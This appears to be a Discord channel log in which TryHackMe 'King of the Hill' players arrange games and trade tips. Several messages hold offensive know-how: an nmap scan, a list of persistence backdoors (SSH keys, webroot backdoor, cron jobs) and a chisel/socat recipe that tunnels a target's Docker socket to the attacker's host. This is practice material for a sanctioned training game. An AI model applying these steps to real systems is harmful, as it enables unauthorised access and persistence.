#koth

1 messages · Page 69 of 1

civic spade
#

we doin VC for this or just text?

fair adder
#

lets' do text

civic spade
#

sounds good

fair adder
#

i got the music loud

civic spade
#

same

fair adder
#

banging super loud lmao

#

our neighbors just moved out a couple days ago so we have music up loud today lol

civic spade
#

ok so how do we do this? im a nooby here

fair adder
#

okay so do you have your config file?

#

your ovpn file downloaded?

civic spade
#

i do not, i got nothing

fair adder
#

or are you using the attack box?

civic spade
#

i got an attack box

fair adder
#

you can also use the attack box

#

usually much faster

#

i will send link

#

and just join from there

civic spade
#

sounds good

fair adder
#

okay

#

first things first

#

go to your profile and click on your profile settings

#

your profile looks like this

#

click on the circle and then click on profile

civic spade
#

ok i am there

fair adder
#

then click on "About You"

civic spade
#

got it

fair adder
#

then scroll down at the bottom and set yourself up as "Intermidiate"

civic spade
#

done

fair adder
#

okay you might need to logout and log back in to take effect

#

ill send you the link now

civic spade
#

ok

#

im assuming i'll wanna change that setting back to what it was later

fair adder
#

if you want to yes

#

here is the link

#

click and join

civic spade
#

joined

fair adder
#

i c u

#

okay

#

so

#

i am not going to go in depth with all the tools we are going to use just the main basic ones

#

first is NMAP

civic spade
#

checks ports and such on a network

fair adder
#

to activate this just simply type "nmap" in your terminal

fair adder
civic spade
#

done

fair adder
#

the very first thing you ever want to do is google dork information about the network or system you are hacking. Then once you have a specific target (network or system) you then want to use a scanning tool like NMAP to see the ports and services it has running

#

In KOTH however, you want to immediately start without your scanning tools

civic spade
#

ok i think i follow

fair adder
#

I personally start with nmap and gobuster and then I drop the IP into my browser

#

so go back to the page and you will see our IP addresss

#

which is our target

#

so i will copy and paste this into my browser and then run nmap

civic spade
#

listed under machine details ya?

fair adder
civic spade
#

ok i got you

fair adder
civic spade
#

ya i see it

#

i assume we have different numbers in those last 3 digits?

fair adder
# civic spade ok i got you

copy and paste it into your browser and then hop on your attack box and run this command: nmap -A -sC -vv -p- IP ADDRESS

fair adder
#

so i don't get in trouble for pasting the entire ip address

#

i don't know the rules on this specifically yet

civic spade
#

oooh ok

fair adder
#

are you able to connect in your browser?

#

and did you run nmap command?

civic spade
#

mmmm i copy pasted it into browser and its coming up as a time out

#

ya i ran nmap

fair adder
#

okay that means that it's not accecessible

#

so we need to hack it

#

we can use our nmap results to start there

#

let's see what our nmap results say

civic spade
#

wait i think i tripped up. i didnt run that nmap -A command

fair adder
#

okay so go to your attack box and run: nmap -A -sC -vv -p- IP ADDRESS

#

this nmap command has a couple switches that will get us some particular results we want

#

for instance i ran this already and found that 5 ports are open

civic spade
#

no spaces in that?

fair adder
#

yes

#

exactly like you see it

#

nmap -A -sC -vv -p- IP ADDRESS

civic spade
#

ok 2 seconds

fair adder
#

okay

#

this machine has smb on it

civic spade
#

ok success! dyslexia was kicking in for a moment

fair adder
#

niice

#

one sec

#

my machine is acting up

civic spade
#

no rush

fair adder
#

just got into my VPN machine

#

kali wsl2 was acting up

civic spade
#

man im sorry, im dipping out of this. my mood kinda got killed. i'll be up for playing again once i've learned more

fair adder
#

You're good ! just remember learn at your pace and silence the outside 😋

civic spade
#

really feeling that emphasis on that outside bit

fair adder
#

don't put too much thought ! let's hack our way out of this lol im running nmap right now to see more results i can send you a spectator link so you can just watch but it won't do you much as learning rooms on your own here on THM will benefit you more

stiff egret
#

thanks @fair adder

sour vectorBOT
#

Gave +1 Rep to @brazen atlas

stiff egret
#

just adding you to the reps blobfingerguns

fair adder
#

@grave zephyr is this you?

nova tide
#

M R . H O L M E S

weary axle
#

ya cause naughty has exams 365*24

stiff egret
nova tide
weary axle
#

rank?

#

or u dealyed it saying "exams...ask ** M R . H O L M E S**"

nova tide
weary axle
#

os? shd heve been op

#

operation postponing kekw surely number 1

stiff egret
#

oooooooooooooooof

placid fable
graceful oriole
#

Hy

#

Kot?

graceful oriole
#

Hii everybody

wide gate
stiff egret
#

Hi

wicked shard
#

Anyone wanna play?

steep agate
#

Hi

jaunty gyro
#

Who is playing?

stiff egret
#

Might, if there are enough players, no fun with 2-3 peeps

steep agate
jaunty gyro
deep crag
weary axle
#

new machine pls

graceful fable
#

anyone wana play koth

distant coral
#

Anyone want to schedule a koth for the weekend

wicked shard
#

Sure

distant coral
#

Saturday, 5PM CST?

distant coral
#

Discord auto converter time:

#

<t:1636844400:F>

graceful fable
#

locked me out

#

i accidently closed my nc reverse shell

graceful oriole
#

👍

#

I've closed the node listener

distant coral
#

My internet went down 3 seconds before the KoTH started

kind otter
lucid salmon
#

@restive terrace hi

elfin bronze
lucid salmon
elfin bronze
#

xD script

#

🙂

#

you can edit it only if you kill the process of script

lucid salmon
#

what a nasty bro

elfin bronze
#

hahha

wicked shard
#

anyone up for a game?

wanton wren
#

yes

wanton wren
#

lol there are 8 people in the game XDDD

nova tide
#

The more the merrier ☺️

steep agate
steep agate
distant coral
#

I am once again requesting to play koth

full bobcat
hidden barn
#

hello

#

back-again-alive

lucid salmon
#

@steep agate hey

distant coral
#

I’d also like to know how he is balling on me rn

lucid salmon
#

Looks like you pwn machines fast

lucid salmon
distant coral
#

As in what I’m saying or how he is being god

steep agate
steep agate
distant coral
#

The one you’re on rn lol

steep agate
distant coral
#

You kinged in 4 minutes while I haven’t even found anything that looks mildly promising

steep agate
#

There are no mysteries, it's very simple, when you make the machines and it falls again you already know the way, this is quite obvious. @distant coral

distant coral
#

What

lucid salmon
steep agate
# distant coral What

uh, if you've ever made a koth machine, and that machine is chosen again, you know how to root, that's pretty obvious...

#

do not you think?@distant coral

distant coral
#

So you already did this machine once

lucid salmon
#

Ok H1:Medium looks fucked up for me

#

good luck

steep agate
distant coral
#

This was my first koth

steep agate
#

oh, okay

lucid salmon
#

Its normal

#

when you do koth machines more than 1 time, you know how to pwn

steep agate
distant coral
#

Wait you did two koths at the SAME TIME

steep agate
sour vectorBOT
#

Gave +1 Rep to @lucid salmon

steep agate
distant coral
#

That just makes me feel worse

steep agate
#

It's not my fault, I'm just playing koth and distracting myself, as soon as I put my nick on the king, I go to the next game, and I don't see any problem with that...

lucid salmon
#

Holy crap

#

Im king

#

@steep agate

#

Im so noob in windows koth xD

#

Nice game everybody

#

Russia Wins

distant coral
#

another med plz

#

if i don't do it i will go to bed before 2am

#

which is very bad

lucid salmon
#

What med is?

distant coral
#

medium

#

h1

lucid salmon
#

ahhh

#

no man, its freaking hard for me xD

#

h1 my worst timing

graceful oriole
#

Niko are you here?

distant coral
#

How do you upgrade from a user powershell? I got the admin password but I don't know how to log in as them.

lucid salmon
#

and putting the creds

distant coral
#

I tried psexec but it wouldn’t work

#

Kept complaining about modules

lucid salmon
#

#feedback-and-ideas @thm you should rotate the machines btw, is bored make the same machines all time :/

#

@hushed palm what is wrong with ya photo man?

short tusk
#

Well, not only do we have limited machines, but you have access to all the machines.
So, if we added a rotation, you would be restricted by the machines and I think that would be more boring

steep agate
#

Hey bro, can I give you an idea for koth's top 10? it would be really cool if there was some kind of reward for these 10 players, after all +100 wins is a lot, it takes time, so with some kind of reward, it would encourage more players to play KoTH

lucid salmon
#

No fucking way maaaan

#

H1 medium again

#

im fucked up

steep agate
#

what bad luck hahahaha

#

it's actually quite simple, to get a shell it's not that complicated

lucid salmon
#

Well was a nice koth, im so noob in windows yet

#

@steep agate you are good, I admit that

steep agate
steep agate
sour vectorBOT
#

Gave +1 Rep to @lucid salmon

lucid salmon
#

@steep agate nice game, im going to feed myself

steep agate
#

thanks!! alright xD

#

nice game

lucid salmon
lucid salmon
#

Hi @tacit locust @fair adder

fair adder
#

hi

lucid salmon
#

Is someone Dosing me? reegun

lucid salmon
lucid salmon
#

@ebon lichen Hi

#

Be kind Im newbie

steep agate
#

@lucid salmon

lucid salmon
#

Hi

stiff egret
#

Hop in maybe, just for fun.

covert surge
#

Can anyone provide hints for KOTH H1:Hard machine

placid fable
steep agate
elfin bronze
#

in the Food machine i foind 6 flags but cant find last 2

#

any hint ?

steep agate
elfin bronze
#

done something similiar to that is it different ? i used grep -rnw . -e 'thm{[0-9,a-z]*}' for every directory manually xD

gilded orchid
#

Hi, so I am doing koth for first time, the ip is not responding and no one has submitted any flags ?

stiff egret
#

Are you connected to VPN?

humble girder
#

On the H1: easy box there is a secret.txt binary file of 256 bytes. Has someone be able to figure out what that is?

brittle galleon
#

i wanna report this dude, he plays with 2 accounts and he keeps resseting the room

nova tide
brittle galleon
#

i did

#

ty

#

he resseted the room every time i got the king

humble girder
#

I can confirm that somewhat. He seems to have documented for himself how to get in quick (which is not illegal) but if you patch that vulnerability he immediately requests for a reset. Don’t know if he plays with 2 accounts.

brittle galleon
#

he did 3 resets

#

i dont care if i lose

#

but not like that

#

:)))

humble girder
#

🙂 Me neither. offtopic But to be honest, if you have done these machines several times it ruins the experience for those that just started out. I don't have a solution for this - I guess limiting the amount of times you can join a game to hack the same machine is too harsh. But for every machine, I wrote a readme that explains how to get in and how to patch the vulns. Especially when being root, you can basically analyze the machine and find all the vulns more easily. I guess we have to rely on the fact that it becomes boring to do the same tricks all the time 😄

brittle galleon
#

true

#

:))

#

practice on this one

graceful oriole
#

Can i ask there about hogwarts room?

graceful oriole
#

i've a question about hogwarts room, how can i use the page that ask about three gift?

placid fable
stiff egret
cursive belfry
#

Can beginner players who just created an account join my private game?

stiff egret
#

Yes, make sure they have set the level on professional iirc in the profile settings

#

You can even play at level 1. The least thing you need is to set your experience level to intermediate/advanced in your profile.

hushed sundial
lyric apex
#

These look like a lot of fun. I watched a youtube video with what was possibly Seth Rogen doing one and it was fantastic

lyric apex
#

Learned a lot from that video!

graceful oriole
sour vectorBOT
#

Gave +1 Rep to @placid fable

placid fable
wind fjord
shadow pivot
#

8min

#

1min

graceful oriole
#

@placid fable @wind fjord tanks for the advices, the next time i'll try

wind fjord
#

I've only played Hogwarts like twice, but I'm pretty sure there are better ways to get in than that tbh

iron cloud
#

KOTH anyone?

fair adder
wind fjord
#

where'd you go :(

fair adder
spiral canyon
lucid salmon
#

Someone wanna KoTH?

#

wanna play

vapid dragon
#

is ther any alteernate method to gain access in carnage on KOTH ??

wicked shard
nova tide
limber rune
#

Is there a way to regain access after being kicked off a box?

wind fjord
#

to be good at koth you can't just root the box, you have to patch stuff and create ways for yourself to get back in

#
  • Create SSH keys
  • Leave a backdoor in the webroot
  • Create a new user that only you know the password to
  • Cron jobs
#

there's a whole lotta stuff you can do and experiment with

fair adder
#

woaw

fair adder
#

I should

vapid dragon
#

how

fair adder
#

Dépend of the vuln

vapid dragon
#

i just want to say that you r tooooo fast man

fair adder
#

Oh yes xD

#

I would like to be the top 1 this month

nova tide
vapid dragon
fair adder
#

Ty

nova tide
fair adder
sour vectorBOT
#

Gave +1 Rep to @nova tide

fair adder
#

I willcheck the rrom

limber rune
limber rune
#

Um

near raft
sour vectorBOT
#

Gave +1 Rep to @nova tide

near raft
#

I haven't tried KotH as yet always backed out but do you always get the same machine/vulnerabilities or is there rotation etc..?

#

Are all machines Linux or we also have Windows machines in there?

lucid salmon
vapid dragon
#

i think

sour vectorBOT
#

Gave +1 Rep to @vapid dragon

fair adder
fair adder
lucid salmon
lucid salmon
terse willow
#

(Be aware that images of code are an awful accessibility practice though)

#

And images of text generally, for that matter

lucid salmon
fair adder
#

That makes sense

#

That way it can be reproduced

terse willow
lucid salmon
#

I'm inspired in Tryhackme Rooms, I like a lot the design

fair adder
#

A write up is a way reproduce your work

lucid salmon
#

But youre right, next time i'll make something better, that was my 1st writeup ever

fair adder
#

You did an awesome job!

lucid salmon
#

Thanks! ^^

vapid dragon
lucid salmon
#

I edit that when im root, but only for patch the sudo permission for donkey

nova tide
lucid salmon
nova tide
lucid salmon
lucid salmon
#

sheesh im not able to find a way to get root via the skidy homework_project in Production machine...

vapid dragon
#

Not sure tho

lucid salmon
#

Yeaj

#

I know that way, but I saw that the skidy dir has a suid file

#

Homework_project

nova tide
#

No spoilers

vapid dragon
fair adder
#

Idea:
Two teams.
Two boxes
Attack/Defend war game.
Try to root the other teams box and patch your own before getting rooted.

#

@nova tide @stiff egret

nova tide
#

no need to tag we always lurking around #koth 😅

nova tide
sour vectorBOT
#

Gave +1 Rep to @quaint bough

fair adder
#

My bad, didn't see you were online

#

I think it will promote more of a community interaction and promote friendly competition

#

You could even do a ladder if you have enough teams sign up

fair adder
#

man I want to get into these kind of exercises, attack/defend, so badly but after reading that autopwn script 👀

#

is there skill based match making or something like that here?

#

I feel like I would react like the zootopia sloth once I get a hold

fallow heart
wind fjord
#

It's what I did my first few times playing

#

The Food and Hackers boxes are both available as their own independent rooms if you want to lab out some persistence, or just get a feel for the game

#

also I believe autopwn scripts are not allowed to actually be used in game

sour vectorBOT
#

Gave +1 Rep to @wind fjord

lyric apex
#

I want to do one of these sometime they look fun

#

How long do they roughly last?

wind fjord
#

1 hour

lyric apex
#

Oh nice

pseudo depot
fallow heart
vapid dragon
graceful oriole
#

Anyone know that the cms on shrek machins is hackerable?

desert chasm
#

I'm kinda new to this, how advanced should one be for koth? Is there some easier ones to start with, or maybe team based ones where one can learn from other more experienced team members?

vapid dragon
desert chasm
#

already did a few CTF, still feels a bit scary to directly go for koth 👀

broken berry
#

you wont know until you try

desert chasm
#

so to answer my question, I guess then there is no such thing as beginner-koth games or team based ones where you can learn from other team members?

nova tide
sour vectorBOT
#

Gave +1 Rep to @nova tide

hollow narwhal
#

anyone for Koth

hollow narwhal
#

anyone did carnage koth

graceful oriole
#

Or is only a trap?

vapid dragon
nova tide
vapid dragon
nova tide
#

stop typing holmes

stiff egret
#

ghosting your msgs KEKW

vapid dragon
hollow narwhal
nova tide
hollow narwhal
#

im in hell

nova tide
lyric apex
#

I recommend anyone who wants to koth just jump in and play I did it for the first time last night and it was a lot of fun

lavish hedge
#

who's up for a game??

brittle ingot
#

On the KOTH screen, where is the option to get to the AttackBox?

brittle ingot
#

awesome! Didn't know about this page in the app. Thank you

terse willow
#

Np blobfingerguns

lyric apex
#

got a lobby open if anyone is interested

quiet schooner
pine raft
#

Anyone is in King of the Hill

vapid dragon
flint karma
#

Does anyone want to play KOTH?

atomic heart
#

Hi i'm wondering is editing /etc/hosts.allow and /etc/hosts.deny legal ?

wind fjord
#

Blocking IPs is not allowed if that’s what your plan was

atomic heart
#

Oh thx!

solar wagon
#

in king of the hill rooms are you allowed to change password for users?

fair adder
#

im going to try king of the hill for the first time

nova tide
fair adder
#

I had to go before I could complete it

fair adder
#

Is there a way to know which "box" spawned for king of the hill? And how often do they spawn

nova tide
fair adder
#

ayyyyyy

#

i dont see where the name of the box is?

placid fable
wraith bough
#

Hello 👋

fair adder
#

whats up

lucid salmon
#

Hi

#

How can I make hyperlinks with text, I forgot the way

vapid dragon
fair adder
#

Sup guys

quiet schooner
#

@fair adder Please keep it in English only here, this is part of Rule 8

fair adder
fair adder
#

How is everyone’s day

stiff egret
#

it's FRAYDAYYYY

fair adder
#

Tomorrow

#

Lol

stiff egret
#

it's 3:16 AM of Friday in my location

fair adder
#

Oh

#

I’m from uk

stiff egret
#

ah, that makes sense

fair adder
#

What’s your thm profile ?

fair adder
stiff egret
#

/p/holmes

fair adder
#

Just holmes?

stiff egret
#

just holmes

fair adder
#

Oh, I’m pretty sure I’ve seen you on the leaderboards

stiff egret
#

do I know you 👀

fair adder
#

Me thm profile is

#

We could’ve been in the same koth game before

stiff egret
#

yeah, possible

nova tide
fair adder
#

Oh sorry I may have spoiled it

fair adder
#

someone mind joining?

#

@nova tide were in the same game

nova tide
#

yes 🙂

sonic belfry
#

KotH really stands for King of the Holmes. 🤔

#

Just change your name to Haughty.

naive goblet
#

shadow thought it stood for king of the ham

fair adder
nova tide
fair adder
#

haha

sonic belfry
#

Or change it to jndiana Jones.

nova tide
#

what would that mean? 😄

sonic belfry
#

jndi:

fair adder
#

naughty look at my message

nova tide
#

what now? 😄

fair adder
#

i tried cat and i thought something was there 😫

#

but no flag sadcooctus

nova tide
#

where?

#

king.txt ?

fair adder
#

yeah

#

i did cat king.txt and it says naughty

nova tide
#

you need to put your name in that file to get 10 points every minute

#

site takes your name from king.txt and gives you points.

#

!docs koth

pearl gladeBOT
nova tide
#

Give that a read in your free time ^

#

Also a blog post linked within for some tips

#

It's also written on KoTH page:

Add your TryHackMe username to /root/king.txt
The longer you're king, the more points you get```
#

@fair adder You can ask me anything you like in here too 🙂

fair adder
#

alright

nova tide
#

Try looking up for chattr binary. man chattr would help.

steep agate
#

👀

terse willow
#

-unmute 795326240285917234 As a heads up: there are currently 109,351 people in this server. Believe it or not, they don't all want to play KoTH with you, so it comes across as incredibly arrogant that you think pinging everyone in the server is a suitable course of action.

It's also mildly insulting that you think we would be stupid enough to let you do so, and, as you've already found out, the bot doesn't appreciate you doing it very much either 🤷‍♂️

sour vectorBOT
#

🔊 Unmuted Mr.Niko#0395

wise light
#

is anyone going to reset the box

fair adder
#

hi

fair adder
mighty vault
#

oh, that joins me to the game? uh ok guess ill give it a shot 😛

mighty vault
#

so on a windows box that doesnt have /root/king.txt ?

fair adder
#

maybe C:\Users\Administrator

mighty vault
#

heh, i guess that file in Shares/King/king.txt is not the right one then 😛

fair adder
#

I didn't found that one ahah

#

you're i believe now at poki right?

mighty vault
#

yeah just got those creds

fair adder
#

yeah, nice to know i was a bit late to secure it

#

haah

mighty vault
#

i suck at windows 😛

fair adder
#

There might be an easier way to get in

mighty vault
#

got 3 accounts, scarra, fed, and poki

fair adder
#

yeah i'm now also trying that way

#

#

🙂

mighty vault
#

wait lol how did you get it so fast, like 5 minutes after i joined the room you were king

fair adder
#

vuln --> PWN PWN PWN

#

ahah

mighty vault
#

🙂

fair adder
#

It was actually a bit weird but okey

#

didn't expected that to

mighty vault
#

yeah the fact that i am very weak with windows is not helping 😛

fair adder
#

I'l give you a hint the last 2min how i get in... 😆

mighty vault
#

lol

#

on of the ports had text freakyyyyy i thought it was a passwrd lol probably something you did

fair adder
#

bXMxN18wMTA= angrycooctus

mighty vault
#

oh wow, such an old exploit i never would have thought...

#

yeah i def need to step up my windows game

#

that wsa fun though, surprised i managed to find 2 flags

fair adder
#

good luck mate 🙂

mighty vault
#

thanks 🙂

#

@fair adder thanks

sour vectorBOT
#

Gave +1 Rep to @bright radish

marsh sierra
#

If anyone wants to join

nova tide
marsh sierra
#

It has started

#

Anywaays

vocal shell
#

@nova tide wanna play a private koth game

#

I am struggling on H1:Hard

nova tide
#

I have a class to attend at 09:30

vocal shell
#

No worries get some rest

nova tide
#

Maybe later?

vocal shell
#

Sure

nova tide
#

Ping me whenever you want to play later i will jump in.

mighty vault
#

ping me as well later, im down 🙂

lyric apex
#

RFS if here - did you remove e2fstools? Or where did you hide chattr? Curious

#

Gg either way

nova tide
lyric apex
#

Seemed like the whole package was gone, but maybe I just need to use busybox if that’s the case

placid fable
lyric apex
placid fable
lyric apex
#

Thanks!

lyric apex
#

I was so tilted lol, there was no way I was winning but I got a root shell with 5 mins left and couldn’t get on the board

#

Just how it goes

brittle flicker
#

Oh?

#

What’s this?

lyric apex
#

It’s a program that makes a file immutable so even root can’t change it

fair adder
#

Sup guys

vapid dragon
fair adder
#

Same

#

Does dis look nice

nova tide
lyric apex
#

I was salty at first but getting into the box is really just getting in the ring

#

Gotta throw some punches

nova tide
lyric apex
#

Mike Tyson quote applies: “everyone has a plan until you get punched in the mouth”

rocky geode
nova tide
lyric apex
#

I am working on some armaments for revenge mortal kombat

lyric apex
#

gg

rocky geode
kindred prairie
#

anyone up for koth?

wicked shard
narrow acorn
#

Hello,
Can wild card exploit work for mv command also?

wicked shard
fair adder
fair adder
echo socket
steep agate
wicked shard
fair adder
#

sum1 join

wicked shard
fair adder
#

sum1

#

please

#

join

kindred prairie
empty pelican
fair adder
kindred prairie
glacial leaf
#

@brittle galleon

brittle galleon
fair adder
empty pelican
kindred prairie
kindred prairie
dim frigate
fair adder
fair adder
ebon lichen
#

Hi @nova tide, it's been a while, hope you are well 🙂 I am keen to share experiences on some of the KotH boxes, are you open to discuss via DM?

nova tide
ebon lichen
glass parrot
#

Someone come play KOTH

glass parrot
#

@manic ice did you change the password?

#

For ssh

deep crag
#

join game if ya want

placid fable
fair adder
rotund smelt
#

hey there, what this does mean 'Uh-oh! Only intermediate and advanced experienced leveled users can play King of the Hill.' ... <script src="https://tryhackme.com/badge/5824"></script>

#

oops , this is my profile badge

hoary rover
#

Change it from beginners to intermediate or advance frok your profile

stiff egret
#

Change your level like this to be able to play KoTH.
Anywhere from Intermediate to Advanced would do.

rotund smelt
sour vectorBOT
#

Gave +1 Rep to @stiff egret

glass parrot
#

Would getting flags after a minute the game has started signify cheating?

#

Because by that time the nmap scan either hasn't finished or says that the host isn't up yet

prisma roost
#

That is a very big problem with koth because not only are the flags same but after solving a machine one or two times, anyone could write a script that takes you to root in no time at all

stiff egret
stiff egret
prisma roost
#

koth is only really fun if it's everyone's first time doing the machine imo

stiff egret
#

Agreed, OR if everyone decides to play fair, i.e. private matches, and then it's a race for king. Which imo is a fun thing to do.

prisma roost
stiff egret
#

It's a game, it's not about who hacks first, it's about if you had fun kicking them offf the machine, or if you heard them shouting in voice chat when you urandom'ed or nyancat'ed their machine.

prisma roost
#

Had to kill the session but fun indeed

stiff egret
#

Yes, that both teaches stuff and makes you laugh out loud at the same time.

#

It's way more fun if everyone is in vc, because then you hear the shouts and see that your bomb landed 😆

prisma roost
#

🙂

empty pelican
fair adder
#

.

obsidian current
#

.

cosmic needle
#

.

nova tide
#

@stiff egret you wanna fight? xD

sour vectorBOT
#

Yes

stiff egret
#

lmao

nova tide
#

bot wants you ded i guess

stiff egret
#

and it said yes

#

lol

#

-8ball

sour vectorBOT
#
8Ball <What-to-ask:Text>

Invalid arguments provided: Not enough arguments passed

stiff egret
#

-8ball is naughty cracked?

sour vectorBOT
#

Yes

stiff egret
#

I mean look at the odds

nova tide
#

yeah keep deleting the messages like no one will know.

stiff egret
#

dude

silent scaffold
#

what do you guys use to find flag ? Because i got root on Fortune and run different command (grep -Ri thm 2>/dev/null
find / -name flag 2>/dev/null, and many more...) But i can 't find the last 2 flags...

stiff egret
#

Some flags are specifically harder to find as they also hold more points. Same regex will not work for all.
Plus some flags might not be in standard format, in some machines flags are base* encoded to make it harder to find. Try to check locations that an attacker would think they'll find juicy files. Most likely flags are placed in practical places. But eh well, creators can be evil and hide flags particularly to make it very complex. In that scenario, the points are also very high.

#

Long story short, it's random.

fair adder
obsidian current
#

13 min left

fair adder
safe escarp
fair adder
wind fjord
#

juun's relative? 🤔

steep agate
#

lol

fair adder
hidden barn
fresh wyvern
#

I received the credentials ||neville:#le#zzmns0bxrqcfe53hgg3vw|| in the hogwarts thm koth however when trying to login via ssh with these values it says incorrect password, can anyone explain this to me I was trying for the whole challenge to get in and ran out of time

#

I tried cracking the hash using john but it didnt work as it said it wasnt a valid hash

errant marten
fresh wyvern
stiff egret
# fresh wyvern I received the credentials ||neville:#le#zzmns0bxrqcfe53hgg3vw|| in the hogwarts...

I don't know if you tried the password in the same game, they change every game.
Other than that, the password is a mix of irritating characters, maybe make sure you are entering it right.
I'd suggest using sshpass -p 'password' to input password. (very bad security practice but eh) this will make sure you are entering the password right.
Plus, as @errant marten suggested, neville's password is fairly easy to get and hence someone might've changed it before you.

rugged leaf
#

who's Omni or below level that's interested in KOTH?

Signify so i can quickly create a room

#

I saw this people in the public game, please let me know if y'all active so i dont just waste time please.

fair adder
unborn anchor
fair adder
quiet schooner
#

@fair adder Can you try to only post the invite once for each game please? Walls of links with embeds take up a lot of space

fair adder
#

@quiet schooner Sorry Not happing Again

fair adder
fair adder
fair adder
nimble lily
#

good fight @fair adder

fair adder
#

Thank u

prisma roost
fair adder
bright geyser
#

The second rule says "only stop a service if it can't be patched other way"
That means someone can just take them all down and say I didn't find any other way?
Because I'm doing a Koth right now and at the beginning I saw telnet, ssh, http open but after one guy became king none are available anymore (I did several nmap -p- scans) 😅

nova tide
mild pivot
#

is it against the rules to kill shell sessions?

#

happened to me, I mean I won anyway but I was curious

wind fjord
#

Killing shell sessions is allowed, but spamming/scripting it is not

#

But people who don't spend time patching will just spam it because that's all they know how to do 🤷‍♂️

#

Source: was that person at one point

dim frigate
#

someone deleted the backup.sh

and no one is voting for reset

#

@viscid parrot bro

#

really??

naive goblet
#

evil play style is evil

prisma roost
#

copied from a few msgs above

dim frigate
#

and no one is voting for reset

naive goblet
#

GG

prisma roost
#

I believe there's more than one method for root in the machines anyways

nova tide
nova tide
ebon lichen
prisma roost
#

"fair few games"
👀

naive goblet
prisma roost
#

private games are a premium feature

naive goblet
#

if it does someone could easily inflate their points... but would assume that might make them get reported for abuse maybe

prisma roost
naive goblet
#

indeeds

nova tide
nova tide
nova tide
prisma roost
naive goblet
sour vectorBOT
#

Gave +1 Rep to @nova tide

nova tide
#

You can start a private game as a normal user, but premium users can select the desired machine while others get a random one.

kindred prairie
mild pivot
#

isnt it kind of lame if premium users can select the desired machine..?

#

it would be easy to just go through and learn all the vulns, build a script to patch them and randomize the order and delay of the patches

#

it would take maybe 3-5 matches to find them then only an hour or two to make the script lol

#

I dont know how big the machine pool is though

kindred prairie
quiet schooner
opal dove
#

even if people don't have an autopwn it only takes a few games and very basic notes to be able to pwn most of the machines before your opponents' nmap scans finish

graceful oriole
#

Anyone playing?

opal dove
nova tide
kindred prairie
bright geyser
#

Attacking others isn't allowed even in these situations? 😂

nova tide
earnest folio
#

Hello, I never tried koth. I'm pretty sure I would manage to find vulns and exploit them but I wouldn't know where to start to patch them ^^ any advice ? Or maybe I should go through Blue team path ?

pearl gladeBOT
nova tide
earnest folio
sour vectorBOT
#

Gave +1 Rep to @nova tide

wicked shard
#

send me @pliant rapids

fair adder
ebon lichen
#

Time for a little break from KotH! Playing KotH has been extremely educational, even therapeutic at times, during this Covid-19 ordeal 😉 Just wanted to say thanks to all. This community is pretty awesome and that is because of all of you!

quartz valley
#

Can anyone suggest me which linux machine is good for beginners to play KOTH?
probably the easiest of all to begin with

brazen cloud
#

Space Jam is pretty beginner friendly and linux @quartz valley

fair adder
#

i'm playing it now

quartz valley
sour vectorBOT
#

Gave +1 Rep to @brazen cloud

brazen cloud
fair adder
stiff egret
#
  1. You need to paste the invite link, top right, options you'll know when you see it
bleak briar
#

6m30s!

stiff egret
#
  1. Naughty nub
quiet schooner
#

Especially as more CVEs have come out that affect the boxes, particularly privilege escalation

fair adder
quiet schooner
#

I also can't speak for THM as a whole

fair adder
#

🤷‍♂️

fair adder
bright geyser
#

if anyone wants to join a public Koth it will start in 7minutes 😁

steep agate
steep agate
steep agate
prisma roost
#

just saw that you're the guy at number 2, welcome back 🙂

steep agate
#

Thanks

#

i was in koth but i had to leave, i have to tidy my bookshelf

#

there are these books and several others on physics, chemistry, harry potter, among others

#

@prisma roost

prisma roost
#

yeh man, had my exams last month so couldn't do thm and ... well it sucked

steep agate
#

end and beginning of the year and always very busy

fair adder
#

Ayo

#

30seconds

nova tide
#

@stiff egret

steep agate
#

😅

stiff egret
steep agate
stiff egret
#

Very very nice to hear! I've been reading The Silent patient recently, would recc def.

steep agate
#

I've never heard of this book before, I'll check it out later.

stiff egret
steep agate
#

I think here in Brazil they don't have this book, in pt-br

stiff egret
#

Ah, yeah, I see you are reading translated versions of them?

steep agate
#

yes, they are translated books

nova tide
stiff egret
stiff egret
prisma roost
steep agate
#

English books I read more when it has something to do with hacking

fair adder
stiff egret
steep agate
#

I'm going to record a video of shell x shell techniques that can also be set useful in a koth

final nest
#

@royal pilot u there mate ?

fair adder
#

:>

gritty stirrup
mighty spoke
#

any idea how to change the permission?

prisma roost
#

or if you want the easy win

#

just del king.txt and echo username > king.txt

mighty spoke
sour vectorBOT
#

Gave +1 Rep to @prisma roost

mighty spoke
prisma roost
fair adder
steep agate
prisma roost
#

infloop is typing

placid fable
#

Here's that earlier post @prisma roost

# on your system
# start the chisel server
chisel server -R -p 3000

# on target machine
# get a port to communicate with the socket file
socat tcp-l:3275,fork,reuseaddr unix-connect:/var/run/docker.sock &!

# connect to the chisel server
chisel client <your-IP>:<port> R:3275:localhost:3275

# on your system
# use docker
docker -H :3275 ...

I have written these from mere memory, so beware of any incorrect flags 😅
That's how I go with koth-H1:Hard machine (one of the 4 containers), getting that port on my system with chisel following a simple docker escape

prisma roost
#

That's one for the notes! happyPanda

#

+rep @placid fable

sour vectorBOT
#

Gave +1 Rep to @placid fable

placid fable
#

Learnt a lot from wreath🙂

prisma roost
#

Yeh, didn't know much about tunnelling before wreath as well

mighty spoke
placid fable
prisma roost
#

What's the last line docker -H :3275 doing
Haven't you forwarded the port to your local machine already?

placid fable
mighty spoke
#

I exploited the machine using a python script

placid fable
prisma roost
prisma roost
fair adder
fair adder
rugged leaf
#

E get one guy wey be jcoscia for here, If i sabi your papa..... Na amadioha go settle our fight, You too dey bully for KOTH, ah!

limber rune
#

Ok wtf is “jcoscia”?????

#

I know you are trying to prestige but it’s ruining the fun for others

molten mason
limber rune
molten mason
#

There's always more than one way into a box...

#

(and you can get there first and do it yourself)

limber rune
steep agate
limber rune
#

Defeated*

steep agate
#

@limber rune what box?

limber rune
steep agate
#

LOL

limber rune
#

Ikrrrrrr

steep agate
#

man this box has more than 1 way to invade, just try to find others

limber rune
#

Lmaoooo I know, I was just messing w jcoscia

#

I hope I spelled their name right

steep agate
#

I understand

limber rune
#

Thank you for your understanding

steep agate
#

:)

limber rune
#
  • defeated male leaves *
steep agate
#

could release more koth machines

limber rune
#

Could

steep agate
#

I'm going to record a video of shell x shell techniques that can also be set useful in a koth

limber rune
#

Oooooo

#

Pls do

steep agate
#

for example hide a pid without hooking

limber rune
#

Yeaaaahhhh

limber rune
steep agate
#

yes I will, and why these last few days are running for me

limber rune
#

Noice!

steep agate
limber rune
steep agate
#

if the enemy doesn't know your PID/PTS, there's no way he can kick you out of the machine, unless he takes permissions from a binary (but that's against the rules, changing binaries, except chattr )

limber rune
#

Daaang

#

